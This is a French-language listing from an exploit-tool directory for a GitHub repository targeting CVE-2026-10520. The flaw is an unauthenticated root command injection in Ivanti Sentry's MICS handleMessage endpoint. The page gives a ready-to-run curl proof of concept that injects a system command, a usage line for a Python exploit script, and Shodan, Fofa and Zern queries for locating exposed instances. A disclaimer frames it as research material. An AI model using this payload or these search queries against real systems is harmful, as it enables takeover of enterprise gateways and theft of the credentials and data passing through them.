Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-10520 — RCE au niveau racine via l'injection de commandes système dans Ivanti Sentry | Kitploit
Outils/GitHubGitHub/error-inside/cve-2026-10520
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHuberror-inside/cve-2026-10520

CVE-2026-10520

RCE au niveau racine via l'injection de commandes système dans Ivanti Sentry

Voir le dépôt
il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-10520

Python CVSS License Educational

Ivanti Sentry (anciennement MobileIron Sentry) est une passerelle de sécurité d'entreprise qui proxy le trafic entre les appareils mobiles et les ressources back-end de l'entreprise : courrier électronique, SharePoint et applications web internes. Elle applique les politiques de gestion des appareils mobiles (MDM), termine les sessions mobiles chiffrées et délivre une authentification basée sur des certificats pour les déploiements d'applications d'entreprise. Les instances de Sentry sont généralement exposées sur internet via le port8443, exposant ainsi l'API d'administration MICS (Mobile Iron Configuration Service).

CVE-2026-10520 est une vulnérabilité d'injection de commande système sans authentification affectant Ivanti Sentry avant les versions R10.5.2, R10.6.2 et R10.7.1 (CVSSv3.1 : 10 Critique, listé dans le catalogue KEV de la CISA). La faille se situe dans le point de terminaison MICS API /mics/api/v2/sentry/mics-config/handleMessage, qui accepte des commandes système encapsulées en XML via un corps de requête POST message encodé URL sans aucune authentification ni validation d’entrée. Un attaquant accédant à un point de terminaison vulnérable peut exécuter des commandes système arbitraires en tant que root, obtenant ainsi le contrôle total de l’hôte — y compris le trafic d’entreprise déchiffré, les identifiants stockés et toutes les données des appareils mobiles gérés.

PoC

root@kitploit:~
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Connection: close" \
  --data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"

Utilisation

root@kitploit:~
python CVE-2026-10520-X7.py
  • Zern : title:"Ivanti System Manager: Sign In"
  • Fofa : body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"
  • Shodan : http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443

Ressources

  • OpenCVE — RCE au niveau racine par injection de commande système dans Ivanti Sentry
  • NIST — Détail CVE-2026-10520
  • Ivanti Sentry — Page officielle du produit

Avertissement

Ce dépôt et son contenu sont fournis strictement à des fins de recherche en sécurité légitime, de tests d’intrusion autorisés, d’étude éducative et de défense. En accédant ou en utilisant ce matériel, vous reconnaissez l’entière responsabilité de veiller à ce que vos activités soient conformes à toutes les lois en vigueur et à ce que vous ayez obtenu une autorisation appropriée avant de tester ou d’appliquer ces techniques sur tout système que vous ne possédez pas.

Les auteurs et mainteneurs de ce projet déclinent toute responsabilité pour tout dommage, conséquence juridique ou mauvaise utilisation résultant de l’application de ces informations. Toute utilisation pour un accès non autorisé, une activité malveillante ou des fins illégales est expressément interdite et non prise en charge.

Utilisez de manière responsable. Restez dans la légalité. Testez uniquement ce que vous possédez ou pour lequel vous avez une autorisation écrite explicite.

Auteurs

  • ErrorInside // SCT

Licence

SCT-PL

Télécharger l’outil